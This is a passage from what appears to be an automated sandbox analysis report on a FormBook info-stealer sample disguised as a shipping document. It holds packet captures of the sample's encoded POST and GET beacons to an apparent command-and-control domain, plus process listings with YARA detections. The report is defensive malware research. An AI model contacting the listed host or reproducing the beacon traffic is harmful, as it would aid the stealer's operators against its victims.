                  Sep 14, 2024 11:12:53.457593918 CEST | 1236 | IN | Data Raw: 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d
                  Data Ascii: .2h3z"/> <path class="st2" d="M419.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M429.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M439.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M449.8 282.4h-3l-6.8 25.2h3z"/> <p
                  Sep 14, 2024 11:12:53.457607985 CEST | 896 | IN | Data Raw: 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 37 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22
                  Data Ascii: > <path class="st2" d="M870 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M860 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M850 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M840 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                  Sep 14, 2024 11:12:53.457627058 CEST | 1236 | IN | Data Raw: 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 31 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36
                  Data Ascii: s="st2" d="M710 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M700 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M690 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M680 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M670 282.4h-
                  Sep 14, 2024 11:12:53.457643032 CEST | 1236 | IN | Data Raw: 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20
                  Data Ascii: <path class="st2" d="M-430.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-420.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-410.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-400.2 282.4h-3l-6.8 25.2h3z"/>
                  Sep 14, 2024 11:12:53.457653999 CEST | 1236 | IN | Data Raw: 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 32 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a
                  Data Ascii: .4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-220.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-210.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-200.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-190.2 282.4h
                  Sep 14, 2024 11:12:53.457663059 CEST | 104 | IN | Data Raw: 32 22 20 64 3d 22 4d 2d 32 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d
                  Data Ascii: 2" d="M-20.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-10.2 282.4h-3l-6.8 25.2h3z"/> <
                  Sep 14, 2024 11:12:53.457674980 CEST | 1236 | IN | Data Raw: 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 35 30 30 20
                  Data Ascii: path class="st2" d="M-.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M500 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M490 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M480 282.4h-3l-6.8 25.2h3z"/> <path class="st2
                  Sep 14, 2024 11:12:53.462788105 CEST | 1236 | IN | Data Raw: 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 39 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c
                  Data Ascii: 25.2h3z"/> <path class="st2" d="M290 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M280 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M270 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M260 282.4h-3l-6.8 25.2h3z"/>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  25 | 192.168.2.4 | 49762 | 84.32.84.32 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:13:06.679667950 CEST | 775 | OUT | POST /n59g/ HTTP/1.1
                  Host: www.parcelfly.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 199
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.parcelfly.net
                  Referer: http://www.parcelfly.net/n59g/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 30 72 50 6b 31 67 36 38 4e 31 5a 33 4f 57 33 6a 38 4c 73 73 6c 67 66 58 77 55 70 69 2b 6e 68 44 37 53 65 57 4b 30 63 2f 34 61 32 37 32 64 61 55 46 79 7a 65 32 46 5a 61 57 57 58 38 69 6b 6d 77 7a 7a 71 6a 6b 72 6d 67 73 6f 34 44 41 57 72 66 39 34 34 76 70 74 48 77 32 73 4b 6c 37 32 50 71 39 43 53 46 44 4a 68 30 51 35 74 74 55 4c 70 54 59 70 39 4b 4f 38 58 4b 6d 42 44 41 6b 51 49 74 4f 31 6c 75 2f 64 30 59 66 7a 70 31 31 76 68 36 39 76 51 46 33 68 6b 63 31 30 55 51 6b 49 61 47 53 49 52 59 4d 7a 72 34 51 4f 62 42 38 54 47 65 73 67 6b 78 65 76 68 6f 45 6b 51 52 71 77 4f 63 4a 51 3d 3d
                  Data Ascii: gd=0rPk1g68N1Z3OW3j8LsslgfXwUpi+nhD7SeWK0c/4a272daUFyze2FZaWWX8ikmwzzqjkrmgso4DAWrf944vptHw2sKl72Pq9CSFDJh0Q5ttULpTYp9KO8XKmBDAkQItO1lu/d0Yfzp11vh69vQF3hkc10UQkIaGSIRYMzr4QObB8TGesgkxevhoEkQRqwOcJQ==


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  26 | 192.168.2.4 | 49763 | 84.32.84.32 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:13:09.228080988 CEST | 795 | OUT | POST /n59g/ HTTP/1.1
                  Host: www.parcelfly.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 219
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.parcelfly.net
                  Referer: http://www.parcelfly.net/n59g/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 30 72 50 6b 31 67 36 38 4e 31 5a 33 63 6e 48 6a 35 6f 55 73 6e 41 66 57 31 55 70 69 77 33 68 48 37 53 43 57 4b 78 6b 76 34 6f 69 37 33 38 71 55 45 33 50 65 78 46 5a 61 5a 32 57 32 6d 6b 6d 72 7a 30 6a 41 6b 70 79 67 73 6f 63 44 41 54 58 66 39 4c 51 73 70 39 48 79 35 4d 4b 6e 31 57 50 71 39 43 53 46 44 4a 63 76 51 36 64 74 56 36 5a 54 4b 37 46 46 48 63 58 4c 68 42 44 41 67 51 49 68 4f 31 6c 63 2f 59 51 79 66 78 68 31 31 76 78 36 38 39 30 45 38 68 6b 53 37 55 56 35 33 4b 4c 65 54 35 39 4a 52 52 44 41 57 75 6a 74 39 56 58 45 39 52 46 6d 4d 76 46 62 5a 6a 5a 6c 6e 7a 7a 56 53 61 57 5a 6f 32 6e 2b 4a 74 41 31 34 62 64 47 36 38 62 30 71 55 6f 3d
                  Data Ascii: gd=0rPk1g68N1Z3cnHj5oUsnAfW1Upiw3hH7SCWKxkv4oi738qUE3PexFZaZ2W2mkmrz0jAkpygsocDATXf9LQsp9Hy5MKn1WPq9CSFDJcvQ6dtV6ZTK7FFHcXLhBDAgQIhO1lc/YQyfxh11vx6890E8hkS7UV53KLeT59JRRDAWujt9VXE9RFmMvFbZjZlnzzVSaWZo2n+JtA14bdG68b0qUo=


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  27 | 192.168.2.4 | 49764 | 84.32.84.32 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:13:11.773127079 CEST | 10877 | OUT | POST /n59g/ HTTP/1.1
                  Host: www.parcelfly.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 10299
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.parcelfly.net
                  Referer: http://www.parcelfly.net/n59g/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 30 72 50 6b 31 67 36 38 4e 31 5a 33 63 6e 48 6a 35 6f 55 73 6e 41 66 57 31 55 70 69 77 33 68 48 37 53 43 57 4b 78 6b 76 34 6f 36 37 32 4b 65 55 46 55 6e 65 77 46 5a 61 55 57 57 31 6d 6b 6e 78 7a 79 4c 63 6b 70 2b 61 73 71 55 44 42 78 50 66 37 36 51 73 6d 39 48 79 68 4d 4b 6d 37 32 4f 79 39 43 43 4a 44 4a 73 76 51 36 64 74 56 34 42 54 4a 70 39 46 4c 38 58 4b 6d 42 44 48 6b 51 4a 30 4f 78 78 6d 2f 59 55 49 65 42 42 31 31 4f 42 36 2f 4f 51 45 31 68 6b 51 38 55 56 68 33 4b 48 2f 54 35 77 6c 52 52 62 6d 57 74 2f 74 38 78 2b 38 69 54 4e 37 65 74 64 54 62 68 78 77 70 53 54 48 62 35 4b 6a 76 6d 2f 4b 56 75 38 66 31 4a 55 51 76 75 65 32 78 45 5a 64 79 74 72 52 53 42 66 63 4d 63 50 38 33 53 39 56 49 6e 4e 34 49 59 64 34 79 77 77 70 30 6a 69 6b 67 62 2b 32 76 32 2f 2b 73 64 69 6c 7a 30 53 4a 55 4e 31 37 57 6e 61 30 30 37 4e 6a 6f 68 4c 46 6d 42 6c 33 76 2f 44 47 6a 5a 57 6a 66 46 52 37 34 6f 79 50 4e 2f 69 69 50 49 39 69 62 4f 67 62 59 51 74 64 6a 37 46 55 75 76 63 6f 42 4e 61 64 33 41 4d 72 70 39 50 [TRUNCATED]
                  Data Ascii: gd=[...] [TRUNCATED]


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  28 | 192.168.2.4 | 49765 | 84.32.84.32 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:13:14.399672031 CEST | 511 | OUT | GET /n59g/?a0=_6Edzvj0xtFLdH&gd=5pnE2UHiCW8ObGXd+5watRyj/n5k8DcBtxaudhAi15+uyfG3JVq1h0FDH1nQvWuKz1Kon5CV4Z0icGbf56g2ndPNw6uI/UGywwOjVsQmNLB0fJ9Ua+cFGcM= HTTP/1.1
                  Host: www.parcelfly.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Sep 14, 2024 11:13:14.891726017 CEST | 1236 | IN | HTTP/1.1 200 OK
                  Server: hcdn
                  Date: Sat, 14 Sep 2024 09:13:14 GMT
                  Content-Type: text/html
                  Content-Length: 10072
                  Connection: close
                  Vary: Accept-Encoding
                  alt-svc: h3=":443"; ma=86400
                  x-hcdn-request-id: 604a0cbc6bad5e4425aee0ed9093924d-bos-edge2
                  Expires: Sat, 14 Sep 2024 09:13:13 GMT
                  Cache-Control: no-cache
                  Accept-Ranges: bytes
                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                  Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                  Sep 14, 2024 11:13:14.891815901 CEST | 224 | IN | Data Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                  Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:3
                  Sep 14, 2024 11:13:14.891834021 CEST | 1236 | IN | Data Raw: 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 33 33 33 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 68 33 7b 66 6f 6e 74
                  Data Ascii: 0px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-weight:600;line-height:28px}hr{margin-top:35px;margin-bottom:35px;border:0;border-top:1px solid #bfbebe}ul{list-style-type:none;margin:0;padding:
                  Sep 14, 2024 11:13:14.891849041 CEST | 1236 | IN | Data Raw: 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 7b 63 6f 6c 6f
                  Data Ascii: align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bottom:16px}.message{width:60%;height:auto;padding:40px 0;align-items:baseline;border-radius:5px
                  Sep 14, 2024 11:13:14.891864061 CEST | 1236 | IN | Data Raw: 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37
                  Data Ascii: -align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0}.container{margin-top:30px}.navbar-links{dis
                  Sep 14, 2024 11:13:14.891877890 CEST | 1236 | IN | Data Raw: 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c
                  Data Ascii: follow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.c
                  Sep 14, 2024 11:13:14.891892910 CEST | 1236 | IN | Data Raw: 6c 79 20 66 61 73 74 2c 20 73 65 63 75 72 65 20 61 6e 64 20 75 73 65 72 2d 66 72 69 65 6e 64 6c 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65
                  Data Ascii: ly fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=co
                  Sep 14, 2024 11:13:14.891906977 CEST | 1236 | IN | Data Raw: 73 65 71 75 65 6e 63 65 22 29 3b 72 3d 28 28 31 30 32 33 26 72 29 3c 3c 31 30 29 2b 28 31 30 32 33 26 65 29 2b 36 35 35 33 36 7d 6e 2e 70 75 73 68 28 72 29 7d 72 65 74 75 72 6e 20 6e 7d 2c 65 6e 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b
                  Data Ascii: sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fr
                  Sep 14, 2024 11:13:14.891921997 CEST | 1236 | IN | Data Raw: 6c 65 6e 67 74 68 2b 31 2c 30 3d 3d 3d 6c 29 2c 4d 61 74 68 2e 66 6c 6f 6f 72 28 66 2f 68 29 3e 72 2d 61 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 33 29 22 29 3b 61 2b 3d 4d 61
                  Data Ascii: length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.charCodeAt(d-1)-65<26),m.splice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase
                  Sep 14, 2024 11:13:14.891947031 CEST300INData Raw: 2e 22 29 7d 2c 74 68 69 73 2e 54 6f 55 6e 69 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 3d 6f 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 6e 29 7b 76 61
                  Data Ascii: .")},this.ToUnicode=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/^xn--/)?punycode.decode(t.slice(4)):t)}return e.join(".")}},pathName=window.location.hostname,account=document.getElementById("pathName"


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:05:10:08
                  Start date:14/09/2024
                  Path:C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe"
                  Imagebase:0xe00000
                  File size:1'280'512 bytes
                  MD5 hash:E57F3CDD911CBAF924BF1E6E7DCC7795
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  Target ID:1
                  Start time:05:10:09
                  Start date:14/09/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe"
                  Imagebase:0x330000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2129407938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2129407938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2132245829.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2132245829.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:true

                  Target ID:5
                  Start time:05:10:43
                  Start date:14/09/2024
                  Path:C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe"
                  Imagebase:0xe70000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3567001047.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3567001047.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  Target ID:6
                  Start time:05:10:45
                  Start date:14/09/2024
                  Path:C:\Windows\SysWOW64\netbtugc.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                  Imagebase:0x820000
                  File size:22'016 bytes
                  MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3567072049.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3567072049.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3565538257.0000000003050000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3565538257.0000000003050000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:moderate
                  Has exited:false

                  Target ID:8
                  Start time:05:10:58
                  Start date:14/09/2024
                  Path:C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe"
                  Imagebase:0xe70000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3568694635.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3568694635.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  Target ID:9
                  Start time:05:11:15
                  Start date:14/09/2024
